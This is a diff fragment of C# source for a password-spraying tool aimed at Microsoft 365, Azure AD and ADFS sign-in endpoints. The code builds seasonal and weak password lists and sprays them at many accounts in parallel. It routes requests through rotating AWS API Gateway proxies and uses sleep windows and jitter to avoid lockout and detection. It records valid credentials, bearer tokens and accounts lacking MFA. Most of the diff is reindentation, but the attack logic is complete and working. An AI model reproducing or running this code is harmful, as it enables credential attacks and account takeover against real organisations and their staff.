+						  (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) loginResp = await _mainMSOLHandler.LoginSprayAttempt(sprayAttempt, userRealmResp);
 
-                                  if (!string.IsNullOrWhiteSpace(loginResp.bearerToken?.access_token))
-                                  {
-                                      if (!userRealmResp.Adfs)
-                                          _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => VALID!", sprayAttempt.FireProxRegion));
-                                      else
-                                          _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => VALID NO MFA!", sprayAttempt.FireProxRegion));
-                                      sprayAttempt.ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken);
-                                      sprayAttempt.Valid = true;
+						  if (!string.IsNullOrWhiteSpace(loginResp.bearerToken?.access_token))
+						  {
+							  if (!userRealmResp.Adfs)
+								  _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => VALID!", sprayAttempt.FireProxRegion));
+							  else
+								  _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => VALID NO MFA!", sprayAttempt.FireProxRegion));
+							  sprayAttempt.ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken);
+							  sprayAttempt.Valid = true;
 
-                                  }
-                                  else if (!string.IsNullOrWhiteSpace(loginResp.bearerTokenError?.error_description) && userRealmResp.Adfs)
-                                  {
-                                      if (loginResp.bearerTokenError.error_description.Contains("User does not exsists?"))
-                                          sprayAttempt.Disqualified = true;
+						  }
+						  else if (!string.IsNullOrWhiteSpace(loginResp.bearerTokenError?.error_description) && userRealmResp.Adfs)
+						  {
+							  if (loginResp.bearerTokenError.error_description.Contains("User does not exsists?"))
+								  sprayAttempt.Disqualified = true;
 
-                                      _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => {loginResp.bearerTokenError?.error_description}", sprayAttempt.FireProxRegion), true, true);
+							  _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => {loginResp.bearerTokenError?.error_description}", sprayAttempt.FireProxRegion), true, true);
 
-                                      sprayAttempt.ResponseCode = loginResp.bearerTokenError?.error_description;
-                                      sprayAttempt.Valid = false;
-                                      sprayAttempt.ConditionalAccess = false;
-                                  }
-                                  else if (!string.IsNullOrWhiteSpace(loginResp.bearerTokenError?.error_description))
-                                  {
-                                      var respCode = loginResp.bearerTokenError.error_description.Split(":")[0].Trim();
-                                      var message = loginResp.bearerTokenError.error_description.Split(":")[1].Trim();
+							  sprayAttempt.ResponseCode = loginResp.bearerTokenError?.error_description;
+							  sprayAttempt.Valid = false;
+							  sprayAttempt.ConditionalAccess = false;
+						  }
+						  else if (!string.IsNullOrWhiteSpace(loginResp.bearerTokenError?.error_description))
+						  {
+							  var respCode = loginResp.bearerTokenError.error_description.Split(":")[0].Trim();
+							  var message = loginResp.bearerTokenError.error_description.Split(":")[1].Trim();
 
-                                      //Set a default response
-                                      var errorCodeOut = (msg: $"UNKNOWN {respCode}", valid: false, disqualified: false, accessPolicy: false);
+							  //Set a default response
+							  var errorCodeOut = (msg: $"UNKNOWN {respCode}", valid: false, disqualified: false, accessPolicy: false);
 
-                                      //Try to parse
-                                      Helpers.Generic.GetErrorCodes().TryGetValue(respCode, out errorCodeOut);
+							  //Try to parse
+							  Helpers.Generic.GetErrorCodes().TryGetValue(respCode, out errorCodeOut);
 
-                                      //Write result
-                                      var printLogBool = (errorCodeOut.accessPolicy || errorCodeOut.valid || errorCodeOut.disqualified);
+							  //Write result
+							  var printLogBool = (errorCodeOut.accessPolicy || errorCodeOut.valid || errorCodeOut.disqualified);
 
-                                      if (!string.IsNullOrEmpty(errorCodeOut.msg))
-                                          _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => {errorCodeOut.msg}", sprayAttempt.FireProxRegion), true, true);
-                                      else
-                                          _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => {respCode.Trim()}", sprayAttempt.FireProxRegion), true, true);
+							  if (!string.IsNullOrEmpty(errorCodeOut.msg))
+								  _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => {errorCodeOut.msg}", sprayAttempt.FireProxRegion), true, true);
+							  else
+								  _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => {respCode.Trim()}", sprayAttempt.FireProxRegion), true, true);
 
-                                      //If we get a valid response, parse and set the token data as json
-                                      if (errorCodeOut.valid)
-                                          sprayAttempt.ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken);
+							  //If we get a valid response, parse and set the token data as json
+							  if (errorCodeOut.valid)
+								  sprayAttempt.ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken);
 
-                                      sprayAttempt.ResponseCode = respCode;
-                                      sprayAttempt.Valid = errorCodeOut.valid;
-                                      sprayAttempt.Disqualified = errorCodeOut.disqualified;
-                                      sprayAttempt.ConditionalAccess = errorCodeOut.accessPolicy;
+							  sprayAttempt.ResponseCode = respCode;
+							  sprayAttempt.Valid = errorCodeOut.valid;
+							  sprayAttempt.Disqualified = errorCodeOut.disqualified;
+							  sprayAttempt.ConditionalAccess = errorCodeOut.accessPolicy;
 
-                                  }
-                                  else
-                                  {
-                                      _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => UNKNOWN or malformed response!", sprayAttempt.FireProxRegion));
+						  }
+						  else
+						  {
+							  _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => UNKNOWN or malformed response!", sprayAttempt.FireProxRegion));
 
-                                  }
+						  }
 
-                                  if (sprayAttempt.Valid)
-                                      validSprayAttempts.Add(sprayAttempt);
+						  if (sprayAttempt.Valid)
+							  validSprayAttempts.Add(sprayAttempt);
 
-                                  _databaseHandler.WriteSprayAttempt(sprayAttempt, teamFiltrationConfig);
-                                  Thread.Sleep(delayInSeconds * 1000);
-                              }
-                              catch (Exception ex)
-                              {
-                                  _databaseHandler.WriteLog(new Log("SPRAY", $"SOFT ERROR when spraying  {sprayAttempt.Username}:{sprayAttempt.Password} => {ex.Message}", sprayAttempt.FireProxRegion));
+						  _databaseHandler.WriteSprayAttempt(sprayAttempt, teamFiltrationConfig);
+						  Thread.Sleep(delayInSeconds * 1000);
+					  }
+					  catch (Exception ex)
+					  {
+						  _databaseHandler.WriteLog(new Log("SPRAY", $"SOFT ERROR when spraying  {sprayAttempt.Username}:{sprayAttempt.Password} => {ex.Message}", sprayAttempt.FireProxRegion));
 
-                              }
-                              _databaseHandler._globalDatabase.Checkpoint();
-                          },
-                            maxDegreeOfParallelism: 20);
+					  }
+					  _databaseHandler._globalDatabase.Checkpoint();
+				  },
+							maxDegreeOfParallelism: 20);
 
 
 
-            return validSprayAttempts;
-        }
-        public static async Task SprayAsync(string[] args)
-        {
-            Random rnd = new Random();
+			return validSprayAttempts;
+		}
+		public static async Task SprayAsync(string[] args)
+		{
+			Random rnd = new Random();
 
-            var forceBool = args.Contains("--force");
+			var forceBool = args.Contains("--force");
 
-            int sleepInMinutesMax = 100;
-            int sleepInMinutesMin = 60;
-            int delayInSeconds = 0;
+			int sleepInMinutesMax = 100;
+			int sleepInMinutesMin = 60;
+			int delayInSeconds = 0;
 
-            string StarTime = "";
-            string StopTime = "";
+			string StarTime = "";
+			string StopTime = "";
 
 
-            var passwordListPath = args.GetValue("--passwords");
-            var exludeListPath = args.GetValue("--exclude");
-            var comboListPath = args.GetValue("--combo");
+			var passwordListPath = args.GetValue("--passwords");
+			var exludeListPath = args.GetValue("--exclude");
+			var comboListPath = args.GetValue("--combo");
 
-            var shuffleUsersBool = args.Contains("--shuffle-users");
-            bool shufflePasswordsBool = args.Contains("--shuffle-passwords");
-            bool shuffleFireProxBool = args.Contains("--shuffle-regions");
-            bool autoExfilBool = args.Contains("--auto-exfil");
+			var shuffleUsersBool = args.Contains("--shuffle-users");
+			bool shufflePasswordsBool = args.Contains("--shuffle-passwords");
+			bool shuffleFireProxBool = args.Contains("--shuffle-regions");
+			bool autoExfilBool = args.Contains("--auto-exfil");
 
-            List<string> passwordList = new List<string>() { };
+			List<string> passwordList = new List<string>() { };
 
-            string[] excludeList = new string[] { };
+			string[] excludeList = new string[] { };
 
-            var databaseHandle = new DatabaseHandler(args);
+			var databaseHandle = new DatabaseHandler(args);
 
-            var _globalProperties = new Handlers.GlobalArgumentsHandler(args, databaseHandle);
-
-            DateTime StarTimeParsed = new DateTime();
-            DateTime StopTimeParsed = new DateTime();
+			var _globalProperties = new Handlers.GlobalArgumentsHandler(args, databaseHandle);
+
+			DateTime StarTimeParsed = new DateTime();
+			DateTime StopTimeParsed = new DateTime();
 
-            //Calcuate time format for spraying to happen
-            if (args.Contains("--time-window"))
-            {
-                var rawInputTime = args.GetValue("--time-window");
-
-                StarTime = rawInputTime.Trim().Split("-")[0];
-                StopTime = rawInputTime.Trim().Split("-")[1];
+			//Calcuate time format for spraying to happen
+			if (args.Contains("--time-window"))
+			{
+				var rawInputTime = args.GetValue("--time-window");
+
+				StarTime = rawInputTime.Trim().Split("-")[0];
+				StopTime = rawInputTime.Trim().Split("-")[1];
 
-                DateTime.TryParseExact(StarTime, "HH:mm", new CultureInfo("en-US"), DateTimeStyles.None, out StarTimeParsed);
+				DateTime.TryParseExact(StarTime, "HH:mm", new CultureInfo("en-US"), DateTimeStyles.None, out StarTimeParsed);
 
-                DateTime.TryParseExact(StopTime, "HH:mm", new CultureInfo("en-US"), DateTimeStyles.None, out StopTimeParsed);
+				DateTime.TryParseExact(StopTime, "HH:mm", new CultureInfo("en-US"), DateTimeStyles.None, out StopTimeParsed);
 
-                if (StarTimeParsed == new DateTime())
-                {
-                    Console.WriteLine($"[!] Failed to parse provided StarTime {StarTime}");
-                    Environment.Exit(0);
-                }
-                if (StarTimeParsed == new DateTime())
-                {
+				if (StarTimeParsed == new DateTime())
+				{
+					Console.WriteLine($"[!] Failed to parse provided StarTime {StarTime}");
+					Environment.Exit(0);
+				}
+				if (StarTimeParsed == new DateTime())
+				{
 
-                    Console.WriteLine($"[!] Failed to parse provided StopTime {StopTime}");
-                    Environment.Exit(0);
-                }
+					Console.WriteLine($"[!] Failed to parse provided StopTime {StopTime}");
+					Environment.Exit(0);
+				}
 
 
-                databaseHandle.WriteLog(new Log("SPRAY", $"Spraying will only occur between {StarTime}-{StopTime}"));
-            }
+				databaseHandle.WriteLog(new Log("SPRAY", $"Spraying will only occur between {StarTime}-{StopTime}"));
+			}
 
-            //Calcuate sleep time from minutes to ms
-            if (args.Contains("--sleep-max"))
-            {
-                sleepInMinutesMax = Convert.ToInt32(args.GetValue("--sleep-max"));
-            }
+			//Calcuate sleep time from minutes to ms
+			if (args.Contains("--sleep-max"))
+			{
+				sleepInMinutesMax = Convert.ToInt32(args.GetValue("--sleep-max"));
+			}
 
-            if (args.Contains("--sleep-min"))
-            {
-                sleepInMinutesMin = Convert.ToInt32(args.GetValue("--sleep-min"));
-            }
+			if (args.Contains("--sleep-min"))
+			{
+				sleepInMinutesMin = Convert.ToInt32(args.GetValue("--sleep-min"));
+			}
 
-            if (args.Contains("--jitter"))
-            {
-                delayInSeconds = Convert.ToInt32(args.GetValue("--jitter"));
-            }
-            else
-            {
-                delayInSeconds = 0;
-            }
+			if (args.Contains("--jitter"))
+			{
+				delayInSeconds = Convert.ToInt32(args.GetValue("--jitter"));
+			}
+			else
+			{
+				delayInSeconds = 0;
+			}
 
-            databaseHandle.WriteLog(new Log("SPRAY", $"Sleeping between {sleepInMinutesMin}-{sleepInMinutesMax} minutes for each round"!));
+			databaseHandle.WriteLog(new Log("SPRAY", $"Sleeping between {sleepInMinutesMin}-{sleepInMinutesMax} minutes for each round"!));
 
-            if (!string.IsNullOrEmpty(exludeListPath))
-            {
-                excludeList = File.ReadAllLines(exludeListPath).Select(x => x.ToLower().Trim()).ToArray();
-                databaseHandle.WriteLog(new Log("SPRAY", $"Excluding {excludeList.Count()} emails"!));
-            }
+			if (!string.IsNullOrEmpty(exludeListPath))
+			{
+				excludeList = File.ReadAllLines(exludeListPath).Select(x => x.ToLower().Trim()).ToArray();
+				databaseHandle.WriteLog(new Log("SPRAY", $"Excluding {excludeList.Count()} emails"!));
+			}
 
-            if (string.IsNullOrEmpty(passwordListPath))
-            {
-                if (args.Contains("--seasons-only"))
-                    passwordList.AddRange(Helpers.Generic.GenerateSeasonPasswords());
+			if (string.IsNullOrEmpty(passwordListPath))
+			{
+				if (args.Contains("--seasons-only"))
+					passwordList.AddRange(Helpers.Generic.GenerateSeasonPasswords());
 
-                if (args.Contains("--months-only"))
-                    passwordList.AddRange(Helpers.Generic.GenerateMonthsPasswords());
+				if (args.Contains("--months-only"))
+					passwordList.AddRange(Helpers.Generic.GenerateMonthsPasswords());
 
-                if (args.Contains("--common-only"))
-                    passwordList.AddRange(Helpers.Generic.GenerateWeakPasswords());
+				if (args.Contains("--common-only"))
+					passwordList.AddRange(Helpers.Generic.GenerateWeakPasswords());
 
-                //By Default do them all
-                if (passwordList.Count() == 0)
-                {
-                    passwordList.AddRange(Helpers.Generic.GenerateSeasonPasswords());
-                    passwordList.AddRange(Helpers.Generic.GenerateMonthsPasswords());
-                    passwordList.AddRange(Helpers.Generic.GenerateWeakPasswords());
-                }
+				//By Default do them all
+				if (passwordList.Count() == 0)
+				{
+					passwordList.AddRange(Helpers.Generic.GenerateSeasonPasswords());
+					passwordList.AddRange(Helpers.Generic.GenerateMonthsPasswords());
+					passwordList.AddRange(Helpers.Generic.GenerateWeakPasswords());
+				}
 
-            }
-            else if (File.Exists(passwordListPath))
-                passwordList = File.ReadAllLines(passwordListPath).Where(x => !string.IsNullOrEmpty(x)).ToList();
+			}
+			else if (File.Exists(passwordListPath))
+				passwordList = File.ReadAllLines(passwordListPath).Where(x => !string.IsNullOrEmpty(x)).ToList();
 
-            //Get a list of valid users from the DB
-            string[] userNameListGlobal = databaseHandle.QueryValidAccount().Select(x => x.Username.ToLower()).Distinct().ToArray();
+			//Get a list of valid users from the DB
+			string[] userNameListGlobal = databaseHandle.QueryValidAccount().Select(x => x.Username.ToLower()).Distinct().ToArray();
 
-            //Pick the first user to enumerate some basic information about the Tenant
-            var getUserRealmResult = await Helpers.Generic.CheckUserRealm(userNameListGlobal.FirstOrDefault(), _globalProperties);
+			//Pick the first user to enumerate some basic information about the Tenant
+			var getUserRealmResult = await Helpers.Generic.CheckUserRealm(userNameListGlobal.FirstOrDefault(), _globalProperties);
 
-            if (getUserRealmResult.UsGovCloud)
-            {
-                databaseHandle.WriteLog(new Log("SPRAY", $"US GOV Tenant detected - Updating spraying endpoint from .com => .us"));
-                _globalProperties.UsCloud = true;
-            }
+			if (getUserRealmResult.UsGovCloud)
+			{
+				databaseHandle.WriteLog(new Log("SPRAY", $"US GOV Tenant detected - Updating spraying endpoint from .com => .us"));
+				_globalProperties.UsCloud = true;
+			}
 
-            if (getUserRealmResult.ThirdPartyAuth && !getUserRealmResult.Adfs)
-            {
-                databaseHandle.WriteLog(new Log("SPRAY", $"Third party authentication detected - Spraying will NOT work properly, sorry!\nThird-Party Authentication url: " + getUserRealmResult.ThirdPartyAuthUrl));
-                Environment.Exit(0);
-            }
+			if (getUserRealmResult.ThirdPartyAuth && !getUserRealmResult.Adfs)
+			{
+				databaseHandle.WriteLog(new Log("SPRAY", $"Third party authentication detected - Spraying will NOT work properly, sorry!\nThird-Party Authentication url: " + getUserRealmResult.ThirdPartyAuthUrl));
+				Environment.Exit(0);
+			}
 
 
-            //Check if this client has ADFS
-            if (getUserRealmResult.Adfs && !_globalProperties.AADSSO)
-            {
-                databaseHandle.WriteLog(new Log("SPRAY", $"ADFS federation detected => {getUserRealmResult.ThirdPartyAuthUrl}"));
-                databaseHandle.WriteLog(new Log("SPRAY", $"TeamFiltration ADFS support in beta, be carefull :) "));
-                _globalProperties.ADFS = true;
+			//Check if this client has ADFS
+			if (getUserRealmResult.Adfs && !_globalProperties.AADSSO)
+			{
+				databaseHandle.WriteLog(new Log("SPRAY", $"ADFS federation detected => {getUserRealmResult.ThirdPartyAuthUrl}"));
+				databaseHandle.WriteLog(new Log("SPRAY", $"TeamFiltration ADFS support in beta, be carefull :) "));
+				_globalProperties.ADFS = true;
 
-            }
+			}
 
 
-            //Remove user exlucde users.
-            userNameListGlobal = userNameListGlobal.Except(excludeList).ToArray();
+			//Remove user exlucde users.
+			userNameListGlobal = userNameListGlobal.Except(excludeList).ToArray();
 
 
-            //Generate a random sleep time based on min-max
-            var currentSleepTime = (new Random()).Next(sleepInMinutesMin, sleepInMinutesMax);
-            var regionCounter = rnd.Next(_globalProperties.AWSRegions.Length - 1);
+			//Generate a random sleep time based on min-max
+			var currentSleepTime = (new Random()).Next(sleepInMinutesMin, sleepInMinutesMax);
+			var regionCounter = rnd.Next(_globalProperties.AWSRegions.Length - 1);
 
-        sprayCalc:
+		sprayCalc:
 
-            if (args.Contains("--time-window"))
-            {
-                if (!Helpers.Generic.IsBewteenTwoDates(DateTime.Now, StarTimeParsed, StopTimeParsed))
-                {
-                    //If we are passed stoptime, we are waiting for the startime the next day, same goes for stoptime
-                    StarTimeParsed = StarTimeParsed.AddDays(1);
-                    StopTimeParsed = StarTimeParsed.AddDays(1);
+			if (args.Contains("--time-window"))
+			{
+				if (!Helpers.Generic.IsBewteenTwoDates(DateTime.Now, StarTimeParsed, StopTimeParsed))
+				{
+					//If we are passed stoptime, we are waiting for the startime the next day, same goes for stoptime
+					StarTimeParsed = StarTimeParsed.AddDays(1);
+					StopTimeParsed = StarTimeParsed.AddDays(1);
 
-                    databaseHandle.WriteLog(new Log("SPRAY", $"Pausing spraying until {StarTimeParsed}"));
+					databaseHandle.WriteLog(new Log("SPRAY", $"Pausing spraying until {StarTimeParsed}"));
 
-                    //Minute since that
-                    int minutesSinceFirstAccountSprayed = Convert.ToInt32(DateTime.Now.Subtract(StarTimeParsed).TotalMinutes);
+					//Minute since that
+					int minutesSinceFirstAccountSprayed = Convert.ToInt32(DateTime.Now.Subtract(StarTimeParsed).TotalMinutes);
 
-                    //time left to sleep based on this
-                    int timeLeftToSleep = currentSleepTime - minutesSinceFirstAccountSprayed;
-                    Thread.Sleep((int)TimeSpan.FromMinutes(timeLeftToSleep).TotalMilliseconds);
+					//time left to sleep based on this
+					int timeLeftToSleep = currentSleepTime - minutesSinceFirstAccountSprayed;
+					Thread.Sleep((int)TimeSpan.FromMinutes(timeLeftToSleep).TotalMilliseconds);
 
-                }
-            }
+				}
+			}
 
 
-            var listOfSprayAttempts = new List<SprayAttempt>() { };
+			var listOfSprayAttempts = new List<SprayAttempt>() { };
 
 
-            //Query Disqualified accounts
-            List<SprayAttempt> diqualifiedAccounts = databaseHandle.QueryDisqualified();
+			//Query Disqualified accounts
+			List<SprayAttempt> diqualifiedAccounts = databaseHandle.QueryDisqualified();
 
-            //Remove Disqualified accounts from the spray list
-            var bufferuserNameList = userNameListGlobal.Except(diqualifiedAccounts.Select(x => x.Username.ToLower())).ToList();
+			//Remove Disqualified accounts from the spray list
+			var bufferuserNameList = userNameListGlobal.Except(diqualifiedAccounts.Select(x => x.Username.ToLower())).ToList();
 
-            //Query emails that has been sprayed in the last X minutes (based on sleep time)
-            var accountsRecentlySprayed = databaseHandle.QuerySprayAttempts(currentSleepTime).OrderByDescending(x => x?.DateTime).ToList();
+			//Query emails that has been sprayed in the last X minutes (based on sleep time)
+			var accountsRecentlySprayed = databaseHandle.QuerySprayAttempts(currentSleepTime).OrderByDescending(x => x?.DateTime).ToList();
 
-            //If all accounts has been sprayed in the last 90 minutes, and we are not forcing sprays, sleep
-            if (accountsRecentlySprayed.Select(x => x.Username.ToLower()).Distinct().Count() >= bufferuserNameList.Count() && !forceBool)
-            {
-                //Find spray attempt most recent
-                var mostRecentAccountSprayed = accountsRecentlySprayed.OrderByDescending(x => x?.DateTime).FirstOrDefault().DateTime;
+			//If all accounts has been sprayed in the last 90 minutes, and we are not forcing sprays, sleep
+			if (accountsRecentlySprayed.Select(x => x.Username.ToLower()).Distinct().Count() >= bufferuserNameList.Count() && !forceBool)
+			{
+				//Find spray attempt most recent
+				var mostRecentAccountSprayed = accountsRecentlySprayed.OrderByDescending(x => x?.DateTime).FirstOrDefault().DateTime;
 
-                //Minute since that
-                int minutesSinceFirstAccountSprayed = Convert.ToInt32(DateTime.Now.Subtract(mostRecentAccountSprayed).TotalMinutes);
+				//Minute since that
+				int minutesSinceFirstAccountSprayed = Convert.ToInt32(DateTime.Now.Subtract(mostRecentAccountSprayed).TotalMinutes);
 
-                //time left to sleep based on this
-                int timeLeftToSleep = currentSleepTime - minutesSinceFirstAccountSprayed;
-                TimeZoneInfo easternZone = TZConvert.GetTimeZoneInfo("Eastern Standard Time");
+				//time left to sleep based on this
+				int timeLeftToSleep = currentSleepTime - minutesSinceFirstAccountSprayed;
+				TimeZoneInfo easternZone = TZConvert.GetTimeZoneInfo("Eastern Standard Time");
 
 
-                databaseHandle.WriteLog(new Log("SPRAY", $"{minutesSinceFirstAccountSprayed}m since last spray, spraying will resume {TimeZoneInfo.ConvertTimeFromUtc(DateTime.UtcNow.AddMinutes(timeLeftToSleep), easternZone)} EST"));
-                Thread.Sleep((int)TimeSpan.FromMinutes(timeLeftToSleep).TotalMilliseconds);
-                goto sprayCalc;
-            }
-            //If we are forcing spray, go ahead
-            else if (forceBool)
-            {   //however only force one round
-                forceBool = false;
-            }
-            else if (accountsRecentlySprayed.Count() > 0)
-            {   //Since we are finishing up a previous spray, remove the ones to not hit
-                bufferuserNameList = bufferuserNameList.Except(accountsRecentlySprayed.Select(x => x.Username.ToLower())).ToList();
-                databaseHandle.WriteLog(new Log("SPRAY", $"Uneven spray round detected"));
-            }
+				databaseHandle.WriteLog(new Log("SPRAY", $"{minutesSinceFirstAccountSprayed}m since last spray, spraying will resume {TimeZoneInfo.ConvertTimeFromUtc(DateTime.UtcNow.AddMinutes(timeLeftToSleep), easternZone)} EST"));
+				Thread.Sleep((int)TimeSpan.FromMinutes(timeLeftToSleep).TotalMilliseconds);
+				goto sprayCalc;
+			}
+			//If we are forcing spray, go ahead
+			else if (forceBool)
+			{   //however only force one round
+				forceBool = false;
+			}
+			else if (accountsRecentlySprayed.Count() > 0)
+			{   //Since we are finishing up a previous spray, remove the ones to not hit
+				bufferuserNameList = bufferuserNameList.Except(accountsRecentlySprayed.Select(x => x.Username.ToLower())).ToList();
+				databaseHandle.WriteLog(new Log("SPRAY", $"Uneven spray round detected"));
+			}
 
 
-            //Get all previous password and email combinations
-            List<string> allCombos = databaseHandle.QueryAllCombos();
-
-            var fireProxList = new List<(Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl)>();
+			//Get all previous password and email combinations
+			List<string> allCombos = databaseHandle.QueryAllCombos();
+
+			var fireProxList = new List<(Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl)>();
 
-            if (shuffleUsersBool)
-                bufferuserNameList = bufferuserNameList.Randomize().ToList();
+			if (shuffleUsersBool)
+				bufferuserNameList = bufferuserNameList.Randomize().ToList();
 
 
-            for (int regionCount = 0; regionCount < _globalProperties.AWSRegions.Length; regionCount++)
-            {
-                if (_globalProperties.AADSSO)
-                    fireProxList.Add(_globalProperties.GetFireProxURLObject("https://autologon.microsoftazuread-sso.com", regionCount));
-                else if (_globalProperties.UsCloud)
-                {
-                    var fireProxObject = _globalProperties.GetFireProxURLObject("https://login.microsoftonline.us", regionCount);
-                    fireProxObject.fireProxUrl = fireProxObject.fireProxUrl + "common/oauth2/token";
-                    fireProxList.Add(fireProxObject);
+			for (int regionCount = 0; regionCount < _globalProperties.AWSRegions.Length; regionCount++)
+			{
+				if (_globalProperties.AADSSO)
+					fireProxList.Add(_globalProperties.GetFireProxURLObject("https://autologon.microsoftazuread-sso.com", regionCount));
+				else if (_globalProperties.UsCloud)
+				{
+					var fireProxObject = _globalProperties.GetFireProxURLObject("https://login.microsoftonline.us", regionCount);
+					fireProxObject.fireProxUrl = fireProxObject.fireProxUrl + "common/oauth2/token";
+					fireProxList.Add(fireProxObject);
 
 
-                }
-                else if (_globalProperties.ADFS)
-                {
-                    Uri adfsHost = new Uri(getUserRealmResult.ThirdPartyAuthUrl);
-                    (Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) adfsFireProxObject = _globalProperties.GetFireProxURLObject($"https://{adfsHost.Host}", regionCount);
-                    string adfsFireProxUrl = adfsFireProxObject.fireProxUrl.TrimEnd('/') + $"{adfsHost.PathAndQuery}";
-                    adfsFireProxObject.fireProxUrl = adfsFireProxUrl;
-                    fireProxList.Add(adfsFireProxObject);
-                }
+				}
+				else if (_globalProperties.ADFS)
+				{
+					Uri adfsHost = new Uri(getUserRealmResult.ThirdPartyAuthUrl);
+					(Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) adfsFireProxObject = _globalProperties.GetFireProxURLObject($"https://{adfsHost.Host}", regionCount);
+					string adfsFireProxUrl = adfsFireProxObject.fireProxUrl.TrimEnd('/') + $"{adfsHost.PathAndQuery}";
+					adfsFireProxObject.fireProxUrl = adfsFireProxUrl;
+					fireProxList.Add(adfsFireProxObject);
+				}
 
-                else
-                {
-                    var fireProxObject = _globalProperties.GetFireProxURLObject("https://login.microsoftonline.com", regionCount);
-                    fireProxObject.fireProxUrl = fireProxObject.fireProxUrl + "common/oauth2/token";
-                    fireProxList.Add(fireProxObject);
-                }
+				else
+				{
+					var fireProxObject = _globalProperties.GetFireProxURLObject("https://login.microsoftonline.com", regionCount);
+					fireProxObject.fireProxUrl = fireProxObject.fireProxUrl + "common/oauth2/token";
+					fireProxList.Add(fireProxObject);
+				}
 
-                if (!shuffleFireProxBool)
-                    break;
-            }
+				if (!shuffleFireProxBool)
+					break;
+			}
 
 
-            await bufferuserNameList.ParallelForEachAsync(
-               async userName =>
-               {
+			await bufferuserNameList.ParallelForEachAsync(
+			   async userName =>
+			   {
 
-                   if (shufflePasswordsBool)
-                       passwordList = passwordList.Randomize().ToList();
+				   if (shufflePasswordsBool)
+					   passwordList = passwordList.Randomize().ToList();
 
-                   foreach (var password in passwordList)
-                   {
-                       var fireProxObject = fireProxList.First();
+				   foreach (var password in passwordList)
+				   {
+					   var fireProxObject = fireProxList.First();
 
-                       if (shuffleFireProxBool)
-                           fireProxObject = fireProxList.Randomize().First();
+					   if (shuffleFireProxBool)
+						   fireProxObject = fireProxList.Randomize().First();
 
-                       //If this combo does NOT exsits, add it
-                       if (!allCombos.Contains(userName.ToLower() + ":" + password))
-                       {
-                           var randomResource = Helpers.Generic.RandomO365Res();
+					   //If this combo does NOT exsits, add it
+					   if (!allCombos.Contains(userName.ToLower() + ":" + password))
+					   {
+						   var randomResource = Helpers.Generic.RandomO365Res();
 
-                           listOfSprayAttempts.Add(new SprayAttempt()
-                           {
+						   listOfSprayAttempts.Add(new SprayAttempt()
+						   {
 
-                               Username = userName,
-                               Password = password,
-                               //ComboHash = "",
-                               FireProxURL = fireProxObject.fireProxUrl,
-                               FireProxRegion = fireProxObject.Item2.Region,
-                               ResourceClientId = randomResource.clientId,
-                               ResourceUri = randomResource.Uri,
-                               AADSSO = _globalProperties.AADSSO,
-                               ADFS = getUserRealmResult.Adfs
-                           });
-                           break;
-                       }
-                   }
-               },
-                 maxDegreeOfParallelism: 500);
+							   Username = userName,
+							   Password = password,
+							   //ComboHash = "",
+							   FireProxURL = fireProxObject.fireProxUrl,
+							   FireProxRegion = "DIRECT",
+							   ResourceClientId = randomResource.clientId,
+							   ResourceUri = randomResource.Uri,
+							   AADSSO = _globalProperties.AADSSO,
+							   ADFS = getUserRealmResult.Adfs
+						   });
+						   break;
+					   }
+				   }
+			   },
+				 maxDegreeOfParallelism: 500);
 
-            if (_globalProperties.AWSRegions.Length - 1 == regionCounter)
-                regionCounter = 0;
-            else
-                regionCounter++;
+			if (_globalProperties.AWSRegions.Length - 1 == regionCounter)
+				regionCounter = 0;
+			else
+				regionCounter++;
 
-            //If i get to this point without any spray items in listOfSprayAttempts,i have nothing left
-            if (listOfSprayAttempts.Count() == 0)
-            {
-                foreach (var fireProxObject in fireProxList)
-                {
-                    await _globalProperties._awsHandler.DeleteFireProxEndpoint(fireProxObject.Item1.RestApiId, fireProxObject.Item2.Region);
-                    Environment.Exit(0);
-                }
-            }
+			//If i get to this point without any spray items in listOfSprayAttempts,i have nothing left
+			if (listOfSprayAttempts.Count() == 0)
+			{
+				foreach (var fireProxObject in fireProxList)
+				{
+					//await _globalProperties._awsHandler.DeleteFireProxEndpoint(fireProxObject.Item1.RestApiId, fireProxObject.Item2.Region);
+					Environment.Exit(0);
+				}
+			}
 
 
-            var validAccounts = await SprayAttemptWrap(listOfSprayAttempts, _globalProperties, databaseHandle, getUserRealmResult, delayInSeconds, regionCounter);
+			var validAccounts = await SprayAttemptWrap(listOfSprayAttempts, _globalProperties, databaseHandle, getUserRealmResult, delayInSeconds, regionCounter);
 
-            foreach (var fireProxObject in fireProxList)
-            {
-                await _globalProperties._awsHandler.DeleteFireProxEndpoint(fireProxObject.Item1.RestApiId, fireProxObject.Item2.Region);
-            }
+			foreach (var fireProxObject in fireProxList)
+			{
